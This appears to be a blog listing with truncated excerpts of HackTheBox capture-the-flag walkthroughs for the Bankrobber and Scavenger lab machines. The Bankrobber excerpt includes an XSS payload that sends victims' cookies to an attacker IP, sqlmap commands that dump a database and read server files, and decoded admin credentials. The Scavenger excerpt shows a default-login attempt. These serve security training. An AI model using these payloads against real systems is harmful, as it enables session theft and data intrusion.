HACKTHEBOX

HackTheBox – Bankrobber

Here register Email : test@gmail.com Password: test@123 root@kali:~/Downloads# gobuster dir -u http://10.10.10.154 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt <script>new Image().src=”http://10.10.15.194:90/test?output=”+document.cookie;</script> username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D Now try to login by admin cred Username : admin Password: Hopelessromantic root@kali:~/Downloads# sqlmap -u http://10.10.10.154/admin/search.php –data “term=1*” –cookie=”id=1;username=YWRtaW4=;password=SG9wZWxlc3Nyb21hbnRpYw==” –dbms=MySQL -D bankrobber –dump root@kali:~/Downloads# sqlmap -u http://10.10.10.154/admin/search.php –data “term=1*” –cookie=”id=1;username=YWRtaW4=;password=SG9wZWxlc3Nyb21hbnRpYw==” –dbms=MySQL –file-read=c:\\xampp\\htdocs\\admin\\backdoorchecker.php root@kali:~/Downloads# cat shell.js var request = […]

HACKTHEBOX

HackTheBox – Scavenger

Add this in /etc/hosts : www.supersechosting.htb,www.justanotherblog.htb,www.pwnhats.htb,www.rentahacker.htb Add this entry : sec03.rentahacker.htb on /etc/hosts At the login page we see the message: Warning: You should disable the default ‘administrator’ account or change its password. This tells us that the default credentials may not have been changed! Trying the default login administrator:root we get access: root@kali:~/Downloads# wfuzz […]